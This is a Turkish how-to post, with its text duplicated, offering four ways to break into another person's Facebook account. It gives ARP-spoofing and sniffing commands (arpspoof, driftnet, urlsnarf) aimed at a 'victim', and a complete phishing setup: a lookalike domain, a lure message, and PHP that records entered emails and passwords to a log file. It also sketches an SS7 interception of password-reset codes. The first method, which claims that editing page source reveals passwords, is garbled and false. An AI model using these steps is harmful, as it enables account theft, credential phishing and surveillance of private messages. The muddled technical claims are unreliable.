FACEBOOK HACKLEME
Merhaba arkadaşlar bu yazımda sizlere facebook hesabı hacklemenin 4 yolunu anlatacağım. Umarım yasal çerçeveler içerisinde kullanılır.
1) Kaynak kodunu kullanarak Facebook şifresini almak: Bu yöntem, bir kişinin Facebook hesabına giriş yapmış olduğu bir bilgisayarda çalışır. Bu yöntemde, web tarayıcısının kaynak kodunu görüntüleyerek ve değiştirerek, gizli şifreyi ortaya çıkarmak mümkündür. Bu yöntemi kullanmak için aşağıdaki adımları izleyebilirsiniz:
- Web tarayıcısı aracılığıyla Facebook web sitesini ziyaret edin.
- Arama kutusuna erişmek için hesabınızdan çıkış yaptığınızdan emin olun.
- Ctrl + U tuşlarına basarak Sayfa Kaynağını Görüntüle sekmesini açın.
- Kaynak kodunu gördüğünüzde seçin, kopyalayın ve bir not defterine yapıştırın. Bunu Ctrl + F tuşlarına basarak gerçekleştirebilirsiniz.
- Kod bir not defterine kopyalandıktan sonra, eylem kelimesini not defterine de yazmanız gerekir. Bu, kaynak kodunda oturum açma formunun eylem özniteliğini bulmanızı sağlar.
- Ardından, action niteliğini process.php ile değiştirin
- Metninizin şuna benzer olduğundan emin olmak için bir kez daha arama yapın: action=”https://www.facebook.com/login.php?login_attempt=1&lwv=111.”
- Aynı web sayfasına geri dönün ve Ctrl + Shift + I tuşlarına basarak Öğeyi İncele seçeneğini kullanın.
- Yeşil renkle vurgulanan tüm metni silin ve post.php ile değiştirin. =post.php
- Şimdi kaynak kodunu kaydedin ve web sayfasını yenileyin.
- Şimdi hesabının şifresini istediğiniz kişinin e-posta adresini girin ve ardından > Öğeyi İncele’ye sağ tıklayın.
- < input type=”password” yazan bir satır göreceksiniz.
- “Şifre” türünü “metin” olarak değiştirin ve kullanıcının Facebook şifresine değiştirmeden erişebileceksiniz.
2) Ortadaki Adam Yöntemiyle Facebook Hackleme: Bu yöntem, bir kişinin Wi-Fi ağına bağlı olduğu bir cihazda çalışır. Bu yöntemde, güvenlik uzmanı Wi-Fi ağındaki trafiği izleyerek ve değiştirerek, hedef cihazın Facebook şifresini ele geçirmeye çalışır. Bu yöntemi kullanmak için aşağıdaki adımları izleyebilirsiniz:
- Kali Linux işletim sistemi
- İyi ağ arayüzü komutu
- Komut satırlarını yürütme konusunda iyi bilgi
- Ağ arayüzünün adını öğrenin.
- Sızacağınız Wi-Fi yönlendiricinin IP adreslerini alın.
- Hedef cihaz IP’si
- Bir terminalde ipconfig komutunu çalıştırarak ağ arabirim adını alın.
- İstediğiniz arayüzün adını kopyalayın ve kaydedin.
- Bir terminalde IP route show komutunu çalıştırarak yönlendiricinin IP adresini alın.
- Bir Ağ İzleme Yazılım Aracı kullanarak kurbanın IP adresini edinin.
- Yeni bir terminalde aşağıdaki komutu yürüterek Linux’ta IPv4 paket iletmeyi etkinleştirin: sysctl -w net.ipv4.ip_forward=1
- Arpspoof kullanarak kurbandan gelen paketleri durdurun. Bu, komutun genel yapısıdır: arpspoof -i [Ağ Arayüzü Adı] -t [Victim IP] [Router IP]. Örnek: arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1
- Komutun çalışmasına izin verin – durdurmayın.
- arpspoof sızdırma program kodunu kullanarak yönlendiriciden gelen paketleri durdurun. Aşağıdaki komutu yürütün: arpspoof -i [Ağ Arayüzü Adı] -t [Yönlendirici IP’si] [Kurban IP’si].
- Komutun çalışmasına izin verin – durdurmayın.
- Driftnet’i kullanarak kurban navigasyonundan görüntüleri koklayın. Driftnet, ağ trafiğini dinlemek ve TCP akışlarından görüntü almak için kullanılan bir programdır. Bu, driftnet komutunun yapısıdır: driftnet -i [Ağ Arayüzü Adı].
- urlsnarf kullanarak kurban navigasyonundan URL bilgilerini koklayın. Bu komut, bir Ortak Günlük biçimini izleyerek tüm HTTP isteklerini koklamanızı sağlar. Aşağıdaki komutu yürütün: urlsnarf -i [Ağ arabirimi adı].
- Bittiğinde, aşağıdaki komutu yürüterek paket iletmeyi devre dışı bırakın: sysctl -w net.ipv4.ip_forward=0.
- Artık kişinin Facebook mesajlarına erişebilecek ve konuşmalarını okuyabileceksiniz.
3) Phishing ile Telefonda Facebook Hesabı Hacklemek: Bu yöntem, bir kişiyi sahte bir Facebook giriş sayfasına yönlendirerek, onun e-posta ve şifresini ele geçirmeye çalışır. Bu yöntemde, güvenlik uzmanı hedef kişiye bir bağlantı gönderir ve onu Facebook hesabına giriş yapması için ikna eder. Ancak bağlantı, gerçek Facebook sayfasına değil, güvenlik uzmanının oluşturduğu sahte bir sayfaya götürür. Hedef kişi bilgilerini girer girmez, güvenlik uzmanı bunları alır ve gerçek Facebook sayfasına yönlendirir. Bu yöntemi kullanmak için aşağıdaki adımları izleyebilirsiniz:
- internet bağlantısı
- Sahte bir kimlik avı sayfası – web sitesi
- İyi tasarım ve ikna becerileri
- Facebook.com’a gidin ve hesabınızdan çıkış yaptığınızdan emin olun.
- Ctrl + U tuşlarına basarak Sayfa Kaynağını Görüntüle sekmesini açın.
- Kaynak kodunu gördüğünüzde seçin, kopyalayın ve bir not defterine yapıştırın. Bunu Ctrl + F tuşlarına basarak gerçekleştirebilirsiniz.
- Kod bir not defterine kopyalandıktan sonra, eylem kelimesini not defterine de yazmanız gerekir. Bu, kaynak kodunda oturum açma formunun eylem özniteliğini bulmanızı sağlar.
- Ardından, action niteliğini process.php ile değiştirin ve kaynak kodunu kaydedin.
- Sahte bir web sitesi oluşturmak için bir web barındırma hizmeti kullanın. Örneğin, 000webhost, Hostinger, Wix gibi hizmetlerden birini seçebilirsiniz.
- Web barındırma hizmetine kaydolun ve bir alan adı seçin. Örneğin, facebook-login.com gibi. Bu alan adının gerçek Facebook sayfasına benzediğinden emin olun.
- Web barındırma hizmetinin kontrol paneline gidin ve dosya yöneticisini açın. Buradan, kaynak kodunu kaydettiğiniz not defteri dosyasını yükleyin. Dosyanın adını index.html olarak değiştirin.
- Ayrıca, process.php adında başka bir dosya oluşturun ve aşağıdaki kodu içine yapıştırın:
<?php
header ('Location: https://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
- Bu kod, hedef kişinin girdiği e-posta ve şifreyi log.txt adlı bir dosyaya kaydeder ve onu gerçek Facebook sayfasına yönlendirir.
- Bu iki dosyayı web barındırma hizmetine yükledikten sonra, sahte web sitenizin hazır olduğunu göreceksiniz.
- Şimdi hedef kişiye sahte web sitenizin bağlantısını gönderin ve onu Facebook hesabına giriş yapması için ikna edin. Örneğin, ona bir mesaj gönderebilirsiniz: "Hey, bu yeni Facebook özelliğini gördün mü? Çok harika! Hemen denemelisin. İşte bağlantısı: https://facebook-login.com"
- Hedef kişi bağlantıya tıkladığında, sahte Facebook giriş sayfasına yönlendirilecek ve e-posta ve şifresini girmesi istenecektir.
- Hedef kişi bilgilerini girdiğinde, siz de web barındırma hizmetinin kontrol panelinden log.txt dosyasını açarak bunları alabileceksiniz.
4) SS-7 GÜVENLİK AÇIĞI KULLANARAK FACEBOOK HACKLEME
SS7 Güvenlik Açığı, GSM ağlarında kullanılan bir iletişim protokolü olan SS7'nin (Signaling System 7) zayıf noktalarını kullanan bir siber saldırı türüdür. SS7, cep telefonlarının kendi operatörleri dışındaki operatörler ile haberleşmesini sağlayan bir ağdır. Bu ağ üzerinden, saldırganlar hedef kişinin SMS trafiğini, konumunu, arama kayıtlarını ve diğer bilgilerini ele geçirebilirler. [Bu link](^1^) size SS7 protokolü ve GSM ağlarındaki potansiyel tehlikeler hakkında daha fazla bilgi verecektir.
SS7 Güvenlik Açığı kullanarak Facebook hesabına erişmek için, hedef kişinin cep telefonu numarasını bilmek ve SS7 ağına erişim sağlayabilecek bir Linux işletim sistemi ve SS7 SDK'sına sahip olmak gerekmektedir. Bu şartları sağladıktan sonra, aşağıdaki adımları takip edebilirsiniz:
- Hedefin cep telefonu numarasını sahte bir MSC (Mobile Switching Center) düğümüne kaydedin. Bu sayede, hedefin gerçek operatörü ile bağlantısı kesilecek ve sizin kontrolünüzdeki sahte operatöre yönlendirilecektir.
- Facebook'ta Parolanızı Unuttum seçeneğini açın ve kullanıcının cep telefonu numarasını girin. Facebook, hedefe iki faktörlü kimlik doğrulama için bir kurtarma kodu gönderecektir.
- Gerçek MSC, SMS'yi SMS-C (Short Message Service Center)'ye dönüştürecektir. SMS-C, HLR (Home Location Register) ile iletişime geçecek ve hedefin yerini soracaktır.
- Gerçek HLR, sahte olan bir MSC adresi sağlayarak yanıt verecektir. Böylece, iki faktörlü kimlik doğrulama kurtarma kodu ele geçirilecek ve cihazınıza yönlendirilecektir.
- Ardından şifreyi sıfırlayabilir ve kişinin Facebook hesabına erişebilirsiniz.
Merhaba arkadaşlar bu yazımda sizlere facebook hesabı hacklemenin 4 yolunu anlatacağım. Umarım yasal çerçeveler içerisinde kullanılır.
1) Kaynak kodunu kullanarak Facebook şifresini almak: Bu yöntem, bir kişinin Facebook hesabına giriş yapmış olduğu bir bilgisayarda çalışır. Bu yöntemde, web tarayıcısının kaynak kodunu görüntüleyerek ve değiştirerek, gizli şifreyi ortaya çıkarmak mümkündür. Bu yöntemi kullanmak için aşağıdaki adımları izleyebilirsiniz:
- Web tarayıcısı aracılığıyla Facebook web sitesini ziyaret edin.
- Arama kutusuna erişmek için hesabınızdan çıkış yaptığınızdan emin olun.
- Ctrl + U tuşlarına basarak Sayfa Kaynağını Görüntüle sekmesini açın.
- Kaynak kodunu gördüğünüzde seçin, kopyalayın ve bir not defterine yapıştırın. Bunu Ctrl + F tuşlarına basarak gerçekleştirebilirsiniz.
- Kod bir not defterine kopyalandıktan sonra, eylem kelimesini not defterine de yazmanız gerekir. Bu, kaynak kodunda oturum açma formunun eylem özniteliğini bulmanızı sağlar.
- Ardından, action niteliğini process.php ile değiştirin
- Metninizin şuna benzer olduğundan emin olmak için bir kez daha arama yapın: action=”https://www.facebook.com/login.php?login_attempt=1&lwv=111.”
- Aynı web sayfasına geri dönün ve Ctrl + Shift + I tuşlarına basarak Öğeyi İncele seçeneğini kullanın.
- Yeşil renkle vurgulanan tüm metni silin ve post.php ile değiştirin. =post.php
- Şimdi kaynak kodunu kaydedin ve web sayfasını yenileyin.
- Şimdi hesabının şifresini istediğiniz kişinin e-posta adresini girin ve ardından > Öğeyi İncele’ye sağ tıklayın.
- < input type=”password” yazan bir satır göreceksiniz.
- “Şifre” türünü “metin” olarak değiştirin ve kullanıcının Facebook şifresine değiştirmeden erişebileceksiniz.
2) Ortadaki Adam Yöntemiyle Facebook Hackleme: Bu yöntem, bir kişinin Wi-Fi ağına bağlı olduğu bir cihazda çalışır. Bu yöntemde, güvenlik uzmanı Wi-Fi ağındaki trafiği izleyerek ve değiştirerek, hedef cihazın Facebook şifresini ele geçirmeye çalışır. Bu yöntemi kullanmak için aşağıdaki adımları izleyebilirsiniz:
- Kali Linux işletim sistemi
- İyi ağ arayüzü komutu
- Komut satırlarını yürütme konusunda iyi bilgi
- Ağ arayüzünün adını öğrenin.
- Sızacağınız Wi-Fi yönlendiricinin IP adreslerini alın.
- Hedef cihaz IP’si
- Bir terminalde ipconfig komutunu çalıştırarak ağ arabirim adını alın.
- İstediğiniz arayüzün adını kopyalayın ve kaydedin.
- Bir terminalde IP route show komutunu çalıştırarak yönlendiricinin IP adresini alın.
- Bir Ağ İzleme Yazılım Aracı kullanarak kurbanın IP adresini edinin.
- Yeni bir terminalde aşağıdaki komutu yürüterek Linux’ta IPv4 paket iletmeyi etkinleştirin: sysctl -w net.ipv4.ip_forward=1
- Arpspoof kullanarak kurbandan gelen paketleri durdurun. Bu, komutun genel yapısıdır: arpspoof -i [Ağ Arayüzü Adı] -t [Victim IP] [Router IP]. Örnek: arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1
- Komutun çalışmasına izin verin – durdurmayın.
- arpspoof sızdırma program kodunu kullanarak yönlendiriciden gelen paketleri durdurun. Aşağıdaki komutu yürütün: arpspoof -i [Ağ Arayüzü Adı] -t [Yönlendirici IP’si] [Kurban IP’si].
- Komutun çalışmasına izin verin – durdurmayın.
- Driftnet’i kullanarak kurban navigasyonundan görüntüleri koklayın. Driftnet, ağ trafiğini dinlemek ve TCP akışlarından görüntü almak için kullanılan bir programdır. Bu, driftnet komutunun yapısıdır: driftnet -i [Ağ Arayüzü Adı].
- urlsnarf kullanarak kurban navigasyonundan URL bilgilerini koklayın. Bu komut, bir Ortak Günlük biçimini izleyerek tüm HTTP isteklerini koklamanızı sağlar. Aşağıdaki komutu yürütün: urlsnarf -i [Ağ arabirimi adı].
- Bittiğinde, aşağıdaki komutu yürüterek paket iletmeyi devre dışı bırakın: sysctl -w net.ipv4.ip_forward=0.
- Artık kişinin Facebook mesajlarına erişebilecek ve konuşmalarını okuyabileceksiniz.
3) Phishing ile Telefonda Facebook Hesabı Hacklemek: Bu yöntem, bir kişiyi sahte bir Facebook giriş sayfasına yönlendirerek, onun e-posta ve şifresini ele geçirmeye çalışır. Bu yöntemde, güvenlik uzmanı hedef kişiye bir bağlantı gönderir ve onu Facebook hesabına giriş yapması için ikna eder. Ancak bağlantı, gerçek Facebook sayfasına değil, güvenlik uzmanının oluşturduğu sahte bir sayfaya götürür. Hedef kişi bilgilerini girer girmez, güvenlik uzmanı bunları alır ve gerçek Facebook sayfasına yönlendirir. Bu yöntemi kullanmak için aşağıdaki adımları izleyebilirsiniz:
- internet bağlantısı
- Sahte bir kimlik avı sayfası – web sitesi
- İyi tasarım ve ikna becerileri
- Facebook.com’a gidin ve hesabınızdan çıkış yaptığınızdan emin olun.
- Ctrl + U tuşlarına basarak Sayfa Kaynağını Görüntüle sekmesini açın.
- Kaynak kodunu gördüğünüzde seçin, kopyalayın ve bir not defterine yapıştırın. Bunu Ctrl + F tuşlarına basarak gerçekleştirebilirsiniz.
- Kod bir not defterine kopyalandıktan sonra, eylem kelimesini not defterine de yazmanız gerekir. Bu, kaynak kodunda oturum açma formunun eylem özniteliğini bulmanızı sağlar.
- Ardından, action niteliğini process.php ile değiştirin ve kaynak kodunu kaydedin.
- Sahte bir web sitesi oluşturmak için bir web barındırma hizmeti kullanın. Örneğin, 000webhost, Hostinger, Wix gibi hizmetlerden birini seçebilirsiniz.
- Web barındırma hizmetine kaydolun ve bir alan adı seçin. Örneğin, facebook-login.com gibi. Bu alan adının gerçek Facebook sayfasına benzediğinden emin olun.
- Web barındırma hizmetinin kontrol paneline gidin ve dosya yöneticisini açın. Buradan, kaynak kodunu kaydettiğiniz not defteri dosyasını yükleyin. Dosyanın adını index.html olarak değiştirin.
- Ayrıca, process.php adında başka bir dosya oluşturun ve aşağıdaki kodu içine yapıştırın:
<?php
header ('Location: https://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
- Bu kod, hedef kişinin girdiği e-posta ve şifreyi log.txt adlı bir dosyaya kaydeder ve onu gerçek Facebook sayfasına yönlendirir.
- Bu iki dosyayı web barındırma hizmetine yükledikten sonra, sahte web sitenizin hazır olduğunu göreceksiniz.
- Şimdi hedef kişiye sahte web sitenizin bağlantısını gönderin ve onu Facebook hesabına giriş yapması için ikna edin. Örneğin, ona bir mesaj gönderebilirsiniz: "Hey, bu yeni Facebook özelliğini gördün mü? Çok harika! Hemen denemelisin. İşte bağlantısı: https://facebook-login.com"
- Hedef kişi bağlantıya tıkladığında, sahte Facebook giriş sayfasına yönlendirilecek ve e-posta ve şifresini girmesi istenecektir.
- Hedef kişi bilgilerini girdiğinde, siz de web barındırma hizmetinin kontrol panelinden log.txt dosyasını açarak bunları alabileceksiniz.
4) SS-7 GÜVENLİK AÇIĞI KULLANARAK FACEBOOK HACKLEME
SS7 Güvenlik Açığı, GSM ağlarında kullanılan bir iletişim protokolü olan SS7'nin (Signaling System 7) zayıf noktalarını kullanan bir siber saldırı türüdür. SS7, cep telefonlarının kendi operatörleri dışındaki operatörler ile haberleşmesini sağlayan bir ağdır. Bu ağ üzerinden, saldırganlar hedef kişinin SMS trafiğini, konumunu, arama kayıtlarını ve diğer bilgilerini ele geçirebilirler. [Bu link](^1^) size SS7 protokolü ve GSM ağlarındaki potansiyel tehlikeler hakkında daha fazla bilgi verecektir.
SS7 Güvenlik Açığı kullanarak Facebook hesabına erişmek için, hedef kişinin cep telefonu numarasını bilmek ve SS7 ağına erişim sağlayabilecek bir Linux işletim sistemi ve SS7 SDK'sına sahip olmak gerekmektedir. Bu şartları sağladıktan sonra, aşağıdaki adımları takip edebilirsiniz:
- Hedefin cep telefonu numarasını sahte bir MSC (Mobile Switching Center) düğümüne kaydedin. Bu sayede, hedefin gerçek operatörü ile bağlantısı kesilecek ve sizin kontrolünüzdeki sahte operatöre yönlendirilecektir.
- Facebook'ta Parolanızı Unuttum seçeneğini açın ve kullanıcının cep telefonu numarasını girin. Facebook, hedefe iki faktörlü kimlik doğrulama için bir kurtarma kodu gönderecektir.
- Gerçek MSC, SMS'yi SMS-C (Short Message Service Center)'ye dönüştürecektir. SMS-C, HLR (Home Location Register) ile iletişime geçecek ve hedefin yerini soracaktır.
- Gerçek HLR, sahte olan bir MSC adresi sağlayarak yanıt verecektir. Böylece, iki faktörlü kimlik doğrulama kurtarma kodu ele geçirilecek ve cihazınıza yönlendirilecektir.
- Ardından şifreyi sıfırlayabilir ve kişinin Facebook hesabına erişebilirsiniz.
